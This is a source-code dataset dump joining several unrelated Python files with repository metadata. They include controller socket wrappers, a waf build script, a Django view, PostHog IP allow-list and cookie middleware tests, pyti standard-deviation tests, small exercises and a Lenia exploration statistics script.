i, j = i+j+1, 0
return retList
# ControllerMotionKernelPeriodMinMaxReset : Reset controller motion kernel min/max periods
def ControllerMotionKernelPeriodMinMaxReset (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'ControllerMotionKernelPeriodMinMaxReset()'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# SocketsStatusGet : Get sockets current status
def SocketsStatusGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'SocketsStatusGet(char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# TestTCP : Test TCP/IP transfert
def TestTCP (self, socketId, InputString):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'TestTCP(' + InputString + ',char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
| [
"[email protected]"
] | |
95cd4d519c8b65d09a90e0a1a1ab1db1c5e65090 | b677894966f2ae2d0585a31f163a362e41a3eae0 | /ns3/pybindgen-0.17.0.post57+nga6376f2/tests/boost/wscript | 575c486512db2596263726622d81756947c7266d | [
"LGPL-2.1-only",
"Apache-2.0"
] | permissive | cyliustack/clusim | 667a9eef2e1ea8dad1511fd405f3191d150a04a8 | cbedcf671ba19fded26e4776c0e068f81f068dfd | refs/heads/master | 2022-10-06T20:14:43.052930 | 2022-10-01T19:42:19 | 2022-10-01T19:42:19 | 99,692,344 | 7 | 3 | Apache-2.0 | 2018-07-04T10:09:24 | 2017-08-08T12:51:33 | Python | UTF-8 | Python | false | false | 1,018 | ## -*- python -*-
#from waflib import Task
import sys
import os.path
import os
import subprocess
# uncomment to enable profiling information
# epydoc uses the profile data to generate call graphs
#os.environ["PYBINDGEN_ENABLE_PROFILING"] = ""
if 0:
DEPRECATION_ERRORS = '-Werror::DeprecationWarning' # deprecations become errors
else:
DEPRECATION_ERRORS = '-Wdefault::DeprecationWarning' # normal python behaviour
def build(bld):
env = bld.env
env['TOP_SRCDIR'] = bld.srcnode.abspath()
bindgen = bld(
features='command',
source='barmodulegen.py',
target='barmodule.cc',
command='${PYTHON} %s ${SRC[0]} ${TOP_SRCDIR} > ${TGT[0]}' % (DEPRECATION_ERRORS,))
if env['CXX'] and env['ENABLE_BOOST_SHARED_PTR'] == True:
obj = bld(features='cxx cxxshlib pyext')
obj.source = [
'bar.cc',
'barmodule.cc'
]
obj.target = 'bar'
obj.install_path = None
obj.env.append_value("INCLUDES", '.')
| [
"[email protected]"
] | ||
2aea9148c27a7fbf9f644d8c40edb2525fad701b | dd483c380c93edb21dae4cb0cb082ba0bfeb3e6a | /app/src/apps/stats/topological_stat/views.py | 7c0caf2793ef1aa6e631cff093ebcec9992ed96e | [] | no_license | BarbaraDiazE/D_Peptide_Builder | 7aa4647c9b0ce20d8a258834d0dffaf21e368224 | d47e29e0b9e55bd6e520bc9caf7d362e796d458d | refs/heads/master | 2020-04-25T02:29:03.092694 | 2019-02-25T20:43:19 | 2019-02-25T20:43:19 | 172,440,859 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 546 | py | from rest_framework.views import APIView
from django.http import HttpResponse
from django.shortcuts import render, render_to_response
import pandas as pd
import os
import glob
from .compute_topological import statTOPOLOGICAL
class TOPOLOGICALView(APIView):
def get(self, request):
csv_name = request.session['csv_name']
stat = statTOPOLOGICAL(csv_name)
stat_topological_html = stat.resolve()
context = {'loaded_data': stat_topological_html}
return render(request, 'stats_topological.html', context) | [
"[email protected]"
] | |
1908f8673019ee60a62183f9409a6ca86cd08649 | 358519772669c73092f625f630722c38e1d33783 | /ctools/Testing/Types/ImproperDihedral2Type.py | 3855f86040c5114b8995f4d188699f85bb2a3205 | [] | no_license | minghao2016/mmtools | e7e61aca084498408ceae965dd6c9450ad89eafa | 3ade988afb51cd54ee5a4067d8deaad88afbb0fe | refs/heads/master | 2021-09-21T01:02:22.522187 | 2014-09-19T03:40:03 | 2014-09-19T03:40:03 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 557 | py | import sys
sys.path.append('..')
from Decorators import *
from Types.AbstractDihedralType import *
class ImproperDihedral2Type(AbstractDihedralType):
@accepts_compatible_units(None,
None,
None,
None,
None,
units.degrees,
units.kilojoules_per_mole * units.radians**(-2))
def __init__(self, atom1, atom2, atom3, atom4, type, xi, k):
"""
"""
AbstractDihedralType.__init__(self, atom1, atom2, atom3, atom4, type)
self.xi = xi
self.k = k
| [
"[email protected]"
] | |
76685f23ac80025d9fc64fa03036df7c4bbdbbbe | 485816a0a8b86818e4f2cefec517e6316e2252d6 | /posthog/test/test_middleware.py | e7bd0e8275c8ba6c3d46790e80193e5a60a215f4 | [
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | abhijitghate/posthog | 3647443274aee6431e7fecf6902644a9fa7eb9d8 | 68dc4d2730600efb00d3708fb7fba70d85612760 | refs/heads/master | 2023-04-19T15:17:25.033992 | 2021-05-13T09:48:59 | 2021-05-13T09:48:59 | 279,130,099 | 1 | 0 | MIT | 2020-07-12T19:04:15 | 2020-07-12T19:04:14 | null | UTF-8 | Python | false | false | 6,775 | py | from django.conf import settings
from rest_framework import status
from posthog.test.base import APIBaseTest
class TestAccessMiddleware(APIBaseTest):
CONFIG_AUTO_LOGIN = False
def test_ip_range(self):
"""
Also test that capture endpoint is not restrictied by ALLOWED_IP_BLOCKS
"""
with self.settings(ALLOWED_IP_BLOCKS=["192.168.0.0/31", "127.0.0.0/25", "128.0.0.1"]):
# not in list
response = self.client.get("/", REMOTE_ADDR="10.0.0.1")
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertIn(b"IP is not allowed", response.content)
response = self.client.get("/batch/", REMOTE_ADDR="10.0.0.1",)
self.assertEqual(
response.status_code, status.HTTP_400_BAD_REQUEST
) # Check for a bad request exception because it means the middleware didn't block the request
# /31 block
response = self.client.get("/", REMOTE_ADDR="192.168.0.1")
self.assertNotEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertNotIn(b"IP is not allowed", response.content)
response = self.client.get("/", REMOTE_ADDR="192.168.0.2")
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertIn(b"IP is not allowed", response.content)
response = self.client.get("/batch/", REMOTE_ADDR="192.168.0.1")
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
response = self.client.get("/batch/", REMOTE_ADDR="192.168.0.2")
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
# /24 block
response = self.client.get("/", REMOTE_ADDR="127.0.0.1")
self.assertNotEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertNotIn(b"IP is not allowed", response.content)
response = self.client.get("/", REMOTE_ADDR="127.0.0.100")
self.assertNotEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertNotIn(b"IP is not allowed", response.content)
response = self.client.get("/", REMOTE_ADDR="127.0.0.200")
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertIn(b"IP is not allowed", response.content)
# precise ip
response = self.client.get("/", REMOTE_ADDR="128.0.0.1")
self.assertNotEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertNotIn(b"IP is not allowed", response.content)
response = self.client.get("/", REMOTE_ADDR="128.0.0.2")
self.assertIn(b"IP is not allowed", response.content)
def test_trusted_proxies(self):
with self.settings(
ALLOWED_IP_BLOCKS=["192.168.0.0/31", "127.0.0.0/25,128.0.0.1"], USE_X_FORWARDED_HOST=True,
):
with self.settings(TRUSTED_PROXIES="10.0.0.1"):
response = self.client.get("/", REMOTE_ADDR="10.0.0.1", HTTP_X_FORWARDED_FOR="192.168.0.1,10.0.0.1",)
self.assertNotIn(b"IP is not allowed", response.content)
def test_attempt_spoofing(self):
    """A forwarded header relayed by an untrusted hop must not bypass the IP block."""
    with self.settings(
        ALLOWED_IP_BLOCKS=["192.168.0.0/31", "127.0.0.0/25,128.0.0.1"],
        USE_X_FORWARDED_HOST=True,
        TRUSTED_PROXIES="10.0.0.1",
    ):
        resp = self.client.get(
            "/", REMOTE_ADDR="10.0.0.1", HTTP_X_FORWARDED_FOR="192.168.0.1,10.0.0.2",
        )
        # 10.0.0.2 is not a trusted proxy, so the request is rejected.
        self.assertIn(b"IP is not allowed", resp.content)
def test_trust_all_proxies(self):
    """With TRUST_ALL_PROXIES any relaying hop is accepted for X-Forwarded-For."""
    with self.settings(
        ALLOWED_IP_BLOCKS=["192.168.0.0/31", "127.0.0.0/25,128.0.0.1"],
        USE_X_FORWARDED_HOST=True,
        TRUST_ALL_PROXIES=True,
    ):
        resp = self.client.get(
            "/", REMOTE_ADDR="10.0.0.1", HTTP_X_FORWARDED_FOR="192.168.0.1,10.0.0.1",
        )
        self.assertNotIn(b"IP is not allowed", resp.content)
class TestToolbarCookieMiddleware(APIBaseTest):
    """The toolbar cookie is set for authenticated users only and cleared on logout."""

    CONFIG_AUTO_LOGIN = False

    def _fetch_toolbar_cookie(self):
        # Helper: GET "/" and return the toolbar cookie morsel from the response.
        return self.client.get("/").cookies[settings.TOOLBAR_COOKIE_NAME]

    def test_logged_out_client(self):
        # Anonymous requests must not receive any cookie at all.
        resp = self.client.get("/")
        self.assertEqual(len(resp.cookies), 0)

    def test_logged_in_client(self):
        with self.settings(TOOLBAR_COOKIE_NAME="phtoolbar", TOOLBAR_COOKIE_SECURE=False):
            self.client.force_login(self.user)
            cookie = self._fetch_toolbar_cookie()
            self.assertEqual(cookie.key, settings.TOOLBAR_COOKIE_NAME)
            self.assertEqual(cookie.value, "yes")
            for attribute, expected in (
                ("path", "/"),
                ("samesite", "None"),
                ("httponly", True),
                ("domain", ""),
                ("comment", ""),
                ("secure", ""),  # not secure when TOOLBAR_COOKIE_SECURE is off
                ("max-age", 31536000),
            ):
                self.assertEqual(cookie[attribute], expected)

    def test_logged_in_client_secure(self):
        with self.settings(TOOLBAR_COOKIE_NAME="phtoolbar", TOOLBAR_COOKIE_SECURE=True):
            self.client.force_login(self.user)
            cookie = self._fetch_toolbar_cookie()
            self.assertEqual(cookie.key, "phtoolbar")
            self.assertEqual(cookie.value, "yes")
            for attribute, expected in (
                ("path", "/"),
                ("samesite", "None"),
                ("httponly", True),
                ("domain", ""),
                ("comment", ""),
                ("secure", True),
                ("max-age", 31536000),
            ):
                self.assertEqual(cookie[attribute], expected)

    def test_logout(self):
        with self.settings(TOOLBAR_COOKIE_NAME="phtoolbar"):
            self.client.force_login(self.user)
            # While logged in the cookie is present with a one-year max-age.
            cookie = self._fetch_toolbar_cookie()
            self.assertEqual(cookie.key, "phtoolbar")
            self.assertEqual(cookie.value, "yes")
            self.assertEqual(cookie["max-age"], 31536000)
            # Logging out empties the cookie and expires it immediately.
            cleared = self.client.get("/logout").cookies[settings.TOOLBAR_COOKIE_NAME]
            self.assertEqual(cleared.key, "phtoolbar")
            self.assertEqual(cleared.value, "")
            self.assertEqual(cleared["max-age"], 0)
| [
"[email protected]"
] | |
8d4456f1709a03ff7ff76e4b6638771ded6bae27 | 4c6113392ea456e1eb964172b43f0c9846ca712a | /tests/test_standard_deviation.py | 6b866dc49e5a5dc366f0596b18e6b8812eb37b4d | [
"MIT"
] | permissive | g8a9/pyti | abd344d4d5eb30f36e6c860eb82567d7cacbd780 | 1697ea000730a2238df70505ba77e165619fdf8c | refs/heads/master | 2020-03-27T11:04:22.417031 | 2019-09-09T08:50:51 | 2019-09-09T08:50:51 | 146,463,237 | 0 | 1 | MIT | 2018-08-28T14:53:08 | 2018-08-28T14:53:07 | null | UTF-8 | Python | false | false | 9,669 | py | from __future__ import absolute_import
import unittest
import numpy as np
from tests.sample_data import SampleData
from pyti import standard_deviation
class TestStandardDeviation(unittest.TestCase):
    """Regression tests for pyti's rolling standard deviation indicator.

    The expected arrays below are precomputed reference outputs, one value per
    input bar; the leading ``period - 1`` entries are NaN because the rolling
    window is not yet full.  NOTE(review): the values appear to be captured
    from a known-good run of ``standard_deviation.standard_deviation`` --
    confirm provenance before editing any literal.
    """

    def setUp(self):
        """Create data to use for testing."""
        # Sample close prices shipped with the test-suite fixtures.
        self.data = SampleData().get_sample_close_data()
        # Expected rolling standard deviation for a 6-bar window.
        self.std_period_6_expected = [np.nan, np.nan, np.nan, np.nan, np.nan,
            6.5577905323871235, 3.523047922845588, 3.64000366300183,
            2.6142411263437193, 2.6233540871691017, 2.5428206123646837,
            2.8984064587286413, 2.8167262321117761, 3.8064874447010402,
            4.1082230546389029, 8.3307254586060449, 10.698429168184775,
            14.471698472075328, 14.149189022696682, 16.029104466563318,
            13.032673938988863, 10.08650583700817, 9.4405432400189078,
            10.488392949669004, 10.589531938035151, 8.7339880161737451,
            5.0316216736422801, 3.8436670858265902, 3.9887023788027181,
            4.0649809347646144, 4.083843369507024, 4.8440000688136395,
            11.967095581914025, 11.182192390880525, 11.491860887892189,
            16.916712151006177, 22.056151447309816, 22.859576257373337,
            16.434078820142823, 14.253613810773276, 13.039983767883554,
            13.022551209344496, 12.50387726533919, 16.058846471649176,
            15.333279710051146, 12.463120663247507, 8.355378307812666,
            9.0049564129983466, 6.6962407364132304, 6.4353546910795751,
            5.2716958055891929, 5.3789689222625849, 9.4365405031010461,
            9.4650967594983619, 10.229352700277104, 9.58579104716976,
            6.4664696705389293, 4.0370422341114756, 5.161696103672357,
            5.3648150014701983, 5.8074081998770941, 5.3992755686912774,
            5.2324474834121784, 1.4768265526684596, 1.3318358257182561,
            3.448881944437431, 4.2672145481566792, 4.2827919242786781,
            5.130538633191148, 5.783125164361131, 5.2763611198123055,
            6.6918926072275768, 8.2688781988046696, 8.8089197218879818,
            7.3125547291399391, 5.0221549159698196, 5.0711711336402896,
            4.9256529178035535, 5.6864083567749528, 6.5936466895540216,
            8.2274234524951151, 8.8677071444652373, 7.4646598493612917,
            8.3602240799315091, 8.0184206674381961, 8.3401744586069686,
            6.6355034976003617, 2.6993406602353964, 2.0581391271405236,
            2.0719885778321165, 2.0978504872051325, 2.2254437759692176,
            3.049114078985355, 4.1007641564306905, 4.3524338019089699,
            3.4153872401237066, 3.4531299811426996, 2.9287608301122723,
            2.648205052483652, 2.6683584217017398, 2.7031296676260124,
            1.2711792425408255, 1.158740695755534, 4.2491112796285666,
            4.7691131250998939, 4.4221567136409838, 3.7499159990591719,
            5.0847300813317311, 13.454516589854368, 17.889961896736011,
            19.98118781921303, 18.782584131760668, 12.993947821966982,
            3.989429783816254, 2.5093963417523479, 2.2056057369046482,
            2.4943830232477606, 8.4362062958812629, 9.8113133677403432,
            11.767257964368774, 10.560069602043356, 9.2450563365869662,
            6.762383209096229, 10.628135772561432, 10.820357973129482,
            11.395558345250143, 8.3253558482505863]
        # Expected rolling standard deviation for an 8-bar window.
        self.std_period_8_expected = [np.nan, np.nan, np.nan, np.nan, np.nan,
            np.nan, np.nan, 7.0210000050867709, 4.1373628591859681,
            3.2119864792457009, 2.7914512354687684, 3.4517159293810558,
            2.9480489916456389, 3.3239821213203209, 3.5875118217824093,
            7.0898191594910145, 9.6610417029280189, 14.687200878413067,
            16.195911080093211, 18.167517274756381, 17.864408150605726,
            15.684568394262103, 11.769444625202757, 10.355555358633076,
            8.9695687903998031, 8.9965326654217108, 9.4195188685136966,
            7.8538143599145407, 4.9657714118035772, 4.4569047555450325,
            3.8001832662573869, 4.1709606207683017, 10.62482193128093,
            10.778041168439238, 10.368574688520509, 14.639153956818289,
            18.713909981233599, 19.898422047991648, 19.861963649146077,
            19.509732690194838, 14.34043079398743, 12.959500651755734,
            12.497358506614786, 14.475216998126715, 15.211531281517024,
            17.001755161495186, 16.432812069149929, 14.674135408943185,
            9.7164201961715975, 7.6440704143800264, 5.8451933855335998,
            5.64821447766586, 8.2422530726910797, 10.625605192848331,
            11.692462086440853, 9.3994635105262265, 8.8257479448324467,
            8.2020719290049708, 6.6277963101298756, 4.6265561088752829,
            5.0357789509525652, 5.1546871874052478, 5.4984069121363168,
            4.875291749511721, 4.4419035494770691, 3.0770089256567457,
            3.888717884562241, 3.9120171997869004, 5.1726366238947525,
            6.0172975365073498, 5.404976542832701, 6.0530629790686739,
            7.3309684363176757, 7.7985836626183254, 7.575020980640458,
            9.0041798825402761, 8.6284213710934914, 5.4515083102883279,
            5.1782069083529505, 5.6630795193831744, 7.1805271145548293,
            8.1723628337044669, 8.0955966867356697, 7.9802591257606208,
            7.8027393312495414, 8.0798487211793066, 7.3342765491901138,
            7.2319093260355505, 5.8455966333642975, 2.3867655938529189,
            2.3230690906643527, 2.6017847583094862, 2.8489970039597292,
            3.6898432022435403, 4.8986382947567213, 4.7263741388087315,
            4.3969662837006034, 4.042064536135654, 3.9273398394187429,
            3.2888054170821017, 2.6214268197736392, 2.3381906924555294,
            2.3338621424582748, 3.6274033904630554, 4.3679741544892181,
            4.5729569989543766, 4.3530613201680106, 5.4448558619253422,
            13.02311290140943, 16.948090442373044, 18.927592811629722,
            20.199922736768791, 19.547403736996472, 17.506905933292263,
            11.913134333283477, 4.0137655992489707, 3.0322316157293447,
            7.5580302611574259, 9.5411865651725272, 11.636474598065714,
            11.543465684100253, 12.016773321962457, 12.317852244956159,
            13.544956625991842, 11.53342773667667, 12.324006697151235,
            11.031367937451309]
        # Expected rolling standard deviation for a 10-bar window.
        self.std_period_10_expected = [np.nan, np.nan, np.nan, np.nan, np.nan,
            np.nan, np.nan, np.nan, np.nan, 6.4860058759009869, 4.1526223307955945,
            3.9927105802672158, 3.3004546824810688, 3.5370766334801407,
            3.3311401118002317, 6.4384024933726254, 8.9119850014834938,
            13.351934067142995, 15.482619969214232, 19.070120928358637,
            20.404015100519359, 18.748148353015203, 16.133700409047169,
            14.06749796121858, 10.572570590395159, 9.1555945859470089,
            8.3281877447083907, 8.5784715033234864, 8.6222052476923263,
            7.3341742699653665, 4.63688305270301, 4.7504993889531688,
            9.7508812137387935, 9.598666805574835, 9.6019130616999515,
            13.188306942136279, 16.671782548166032, 17.789894790770031,
            17.598722302106669, 17.607555480531644, 17.578184743849089,
            18.26081734205783, 14.630932263150182, 14.408303315950986,
            13.91782390398089, 15.258254924247829, 17.018062822255114,
            19.390673273509599, 17.141471640439732, 13.282047574744562,
            8.829194250389504, 6.9174080727136875, 7.5843822717769385,
            9.459425928082986, 10.848561399763753, 11.075405435267605,
            10.800855984596765, 8.4768862207770468, 8.7709599753327296,
            8.5115699035032346, 6.5623254685786003, 4.577379648275234,
            4.8737227386601729, 4.8845566158386609, 4.9416124224116613,
            4.7068613038131062, 4.847774403441905, 3.641202640154293,
            4.865707211358564, 5.8317850326179617, 5.5646648097117852,
            5.8853513064217546, 6.6371132446435244, 7.1101839326107275,
            7.1871184922903826, 8.3465498527502113, 9.073611555861687,
            9.0870854024330132, 8.3398348638060895, 5.9142930450073328,
            6.4203717441697474, 7.2659339080090346, 7.2219849533674978,
            7.5313847774938836, 7.758637122587956, 7.6485459039247745,
            7.1610294883720007, 7.2388940990856998, 6.9341618895949626,
            6.6686421239842977, 5.2047658715621195, 2.6397003196912121,
            3.1091942507487307, 3.9894729532163118, 4.6656708461318193,
            4.5243402220041311, 5.1604522842264302, 5.3878571291789461,
            4.974325638270523, 4.4714657055103819, 3.9744830551350327,
            3.0170508042715429, 2.3489572154468794, 3.5151007572092858,
            4.0541939875749557, 4.1687462810245028, 4.2825289776537945,
            5.7083739657921253, 12.580634324230228, 16.397131049871689,
            19.065494398694895, 20.371646308861077, 19.941000225665718,
            20.204460151164653, 18.947481949383747, 16.459877952834979,
            11.294674261202355, 8.0265482410975864, 9.2898478040397627,
            11.14332904576645, 11.873670966563889, 12.684673166200744,
            13.797316164143426, 16.063193435096697, 15.897444378823213,
            15.397173477983268, 12.449335591374611]

    def test_standard_deviation_period_6(self):
        """6-bar window output matches the precomputed reference exactly."""
        period = 6
        std = standard_deviation.standard_deviation(self.data, period)
        np.testing.assert_array_equal(std, self.std_period_6_expected)

    def test_standard_deviation_period_8(self):
        """8-bar window output matches the precomputed reference exactly."""
        period = 8
        std = standard_deviation.standard_deviation(self.data, period)
        np.testing.assert_array_equal(std, self.std_period_8_expected)

    def test_standard_deviation_period_10(self):
        """10-bar window output matches the precomputed reference exactly."""
        period = 10
        std = standard_deviation.standard_deviation(self.data, period)
        np.testing.assert_array_equal(std, self.std_period_10_expected)

    def test_standard_deviation_invalid_period(self):
        """A period longer than the data series must raise with a clear message."""
        period = 128
        with self.assertRaises(Exception) as cm:
            standard_deviation.standard_deviation(self.data, period)
        expected = "Error: data_len < period"
        self.assertEqual(str(cm.exception), expected)
| [
"[email protected]"
] | |
3208b05d0da560dca27f9423abf4a82b2b8c2985 | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/30/usersdata/82/9455/submittedfiles/atividade.py | c5d3ff8f09f278a98531a889412358d110818bae | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 192 | py | # -*- coding: utf-8 -*-
from __future__ import division
import math
def serie_soma(n):
    """Return 1/n + 2/(n-1) + ... + n/1, i.e. sum of i / (n - i + 1) for i = 1..n."""
    soma = 0
    i = 1
    j = n
    while i <= n:
        soma = soma + i / j
        i = i + 1
        j = j - 1
    return soma


if __name__ == "__main__":
    # int(...) keeps the script working on Python 3, where input() returns str.
    n = int(input('Digite o valor de n:'))
    # Bug fix: the original format string was '%.5 f' -- the space makes ' ' an
    # invalid conversion character and raises ValueError at runtime.
    print('%.5f' % serie_soma(n))
| [
"[email protected]"
] | |
9ccd664cded01d384a74b70078226710006213ac | cf7fed790b733b9a21ec6c65970e9346dba103f5 | /opencv/gen_sine_table.py | a92197731a8388aa38b098c9704de464791890c8 | [
"MIT"
] | permissive | CospanDesign/python | a582050993efc1e6267683e38dd4665952ec6d40 | a3d81971621d8deed2f1fc738dce0e6eec0db3a7 | refs/heads/master | 2022-06-20T15:01:26.210331 | 2022-05-29T01:13:04 | 2022-05-29T01:13:04 | 43,620,126 | 6 | 3 | null | null | null | null | UTF-8 | Python | false | false | 2,006 | py | #! /usr/bin/env python3
# Copyright (c) 2017 Dave McCoy ([email protected])
#
# NAME is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# any later version.
#
# NAME is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with NAME; If not, see <http://www.gnu.org/licenses/>.
import sys
import os
import argparse
import numpy as np
#sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), os.pardir)))
# Script name as shown in the startup banner and the usage string.
NAME = os.path.basename(os.path.realpath(__file__))
# argparse description; %s is filled with the script name.
DESCRIPTION = "\n" \
              "\n" \
              "usage: %s [options]\n" % NAME
# argparse epilog shown after the option list (placeholder example text).
EPILOG = "\n" \
         "\n" \
         "Examples:\n" \
         "\tSomething\n" \
         "\n"
def main(argv):
#Parse out the commandline arguments
parser = argparse.ArgumentParser(
formatter_class=argparse.RawDescriptionHelpFormatter,
description=DESCRIPTION,
epilog=EPILOG
)
parser.add_argument("-t", "--test",
nargs=1,
default=["something"])
parser.add_argument("-d", "--debug",
action="store_true",
help="Enable Debug Messages")
args = parser.parse_args()
print ("Running Script: %s" % NAME)
if args.debug:
print ("test: %s" % str(args.test[0]))
sine_table = []
for i in range(0, 180):
j = i / 2
#print ("%f" % (j))
k = np.deg2rad(j)
sine_table.append(np.sin(k))
with open("sine_table_float.txt", 'w') as f:
for d in sine_table:
f.write("%f\n" % d)
if __name__ == "__main__":
main(sys.argv)
| [
"[email protected]"
] | |
60e9881d0417bfd779ab8f261e6d4a6eba1be611 | f2ee087b896000ce500ecdb50d6af3a81c9ea67a | /ex16_read_write_file/ex16.py | 21af6acf9f67a01ada06dcad48bed4c2ac91e3b0 | [] | no_license | billgoo/Learn_Python_the_Hard_Way | 5a029223701f1fd6929afbe51b7cd3bfff3e7410 | a280b4110a10d41edda2e90c817f7a8fbc0cecd6 | refs/heads/master | 2020-05-04T17:39:42.275970 | 2019-08-14T14:28:35 | 2019-08-14T14:28:35 | 179,321,167 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,665 | py | """
========= ===============================================================
Character Meaning
--------- ---------------------------------------------------------------
'r' open for reading (default)
'w' open for writing, truncating the file first
'x' create a new file and open it for writing
'a' open for writing, appending to the end of the file if it exists
'b' binary mode
't' text mode (default)
'+' open a disk file for updating (reading and writing)
'U' universal newline mode (deprecated)
========= ===============================================================
"""
from sys import argv
def main():
    """Overwrite the file named on the command line with three user-typed
    lines, then echo the new contents back.

    Bug fix: the two f-strings below had no placeholder and printed the
    literal text "(unknown)"; they now interpolate the target filename.
    """
    script, filename = argv

    print(f"We're going to erase {filename}.")
    print("If you don't want that, hit CTRL-C (^C).")  # KeyboardInterrupt
    print("If you do want that, hit RETURN.")

    input("?")

    print("Opening the file...")
    print("Truncating the file. Goodbye!")
    # 'w' mode already truncates on open, so no explicit truncate() is needed;
    # the with-block guarantees the handle is closed even on error.
    with open(filename, 'w') as target:
        print("Now I'm going to ask you for three lines.")

        line1 = input("line 1: ")
        line2 = input("line 2: ")
        line3 = input("line 3: ")

        print("I'm going to write these to the file.")
        # Single write instead of six write() calls (study drill).
        target.write(f"{line1}\n{line2}\n{line3}\n")

    print("And finally, we close it.")

    with open(filename) as txt:
        print(f"Here's your file {filename}:")
        print(txt.read())


if __name__ == "__main__":
    main()
"[email protected]"
] | |
ae8c313063f63d8ca46adb08c54ed25e9c15a211 | 6968c7f9d2b20b5296663829f99a27d184a59fc1 | /experiments/explorations/experiments/experiment_000202/repetition_000002/calc_statistics_per_repetition.py | 782a2e55a6ea5672f1258b531b384649ad3979d5 | [
"MIT"
] | permissive | flowersteam/automated_discovery_of_lenia_patterns | d42dff37323d51732571b33845c0562d844f498f | 97cc7cde2120fa95225d1e470e00b8aa8c034e97 | refs/heads/master | 2020-06-29T07:08:58.404541 | 2020-05-14T07:37:10 | 2020-05-14T07:37:10 | 200,470,902 | 13 | 2 | null | null | null | null | UTF-8 | Python | false | false | 5,282 | py | import exputils
import autodisc as ad
import os
import imageio
import numpy as np
import torch
import importlib
from torch.autograd import Variable
from sklearn.manifold import TSNE
tsne = TSNE(n_components=2, init='pca', random_state=0)
def collect_final_observation(explorer):
    """Render the last observed state of every run as a PNG.

    Returns a dict mapping '<run id, zero padded>.png' to the encoded bytes.
    Runs without observations are skipped.
    """
    images = dict()
    for run in explorer.data:
        observations = run.observations
        if observations is None or len(observations.states) == 0:
            continue
        # Map state values from [0, 1] to [0, 255] greyscale bytes.
        frame = (observations.states[-1] * 255).astype(np.uint8)
        images['{:06d}.png'.format(run.id)] = imageio.imwrite(
            imageio.RETURN_BYTES,
            frame,
            format='PNG-PIL')
    return images
def collect_observations(explorer):
    """Render selected intermediate states of every run as PNGs.

    Returns a dict mapping '<run id>_<timestep>.png' to the encoded bytes for
    a fixed set of snapshot timesteps.  Runs without observations are skipped.
    """
    snapshot_steps = (0, 24, 49, 74, 99, 124, 149, 174, 199)
    images = dict()
    for run in explorer.data:
        observations = run.observations
        if observations is None or len(observations.states) == 0:
            continue
        for step in snapshot_steps:
            # Map state values from [0, 1] to [0, 255] greyscale bytes.
            frame = (observations.states[step] * 255).astype(np.uint8)
            images['{:06d}_{:06d}.png'.format(run.id, step)] = imageio.imwrite(
                imageio.RETURN_BYTES,
                frame,
                format='PNG-PIL')
    return images
def collect_representation(explorer):
    """Collect the goal-space coordinates of every finished run.

    Returns a dict with the representation type, run count, goal-space
    dimensionality and legend, the raw goal-space coordinates, and a 2-D
    t-SNE embedding of those coordinates (computed with the module-level
    `tsne` instance).
    """
    data = dict()
    data_representations = []
    n_runs = explorer.data.__len__()
    # A VAE-based goal space is marked by the 'pytorchnnrepresentation' type;
    # otherwise the goal space is built from hand-crafted statistics ('HF').
    if hasattr(explorer.config.goal_space_representation, 'type') and explorer.config.goal_space_representation.type == 'pytorchnnrepresentation':
        if type(explorer).__name__.lower() == 'goalspaceexplorer':
            explorer_type = 'pretrainVAE'
        elif type(explorer).__name__.lower() == 'onlinelearninggoalexplorer':
            explorer_type = 'onlineVAE'
        # NOTE(review): if the explorer class is neither of the two above,
        # `explorer_type` stays unbound and the code below raises -- confirm
        # only these two explorer classes can carry a VAE goal space.
        model = explorer.goal_space_representation.model
        n_dims_goal_space = model.n_latents
        representation_legend = ['dim {}'.format(dim) for dim in range(n_dims_goal_space)]
    else:
        explorer_type = 'HF'
        model = None
        representation_legend = explorer.config.goal_space_representation.config.statistics
        n_dims_goal_space = len(explorer.config.goal_space_representation.config.statistics)
    for run_data in explorer.data:
        if run_data.observations is not None and len(run_data.observations.states) > 0:
            # fixed representation stored in run_data.reached_goal
            if explorer_type == 'HF' or explorer_type == 'pretrainVAE':
                data_representations.append(run_data.reached_goal)
            # online version: recompute the reached goal with last trained VAE
            elif explorer_type == 'onlineVAE':
                final_observation = run_data.observations.states[-1]
                # Add batch and channel dimensions -- presumably (H, W) ->
                # (1, 1, H, W) for the conv encoder; TODO confirm state shape.
                input_img = Variable(torch.from_numpy(final_observation).unsqueeze(0).unsqueeze(0).float())
                outputs = model(input_img)
                representation = outputs['mu'].cpu().data.numpy().reshape(n_dims_goal_space)
                data_representations.append(representation)
    data['representation_type'] = explorer_type
    data['n_runs'] = n_runs
    data['n_dims_goal_space'] = n_dims_goal_space
    data['representation_legend'] = representation_legend
    data['coordinates_in_goal_space'] = data_representations
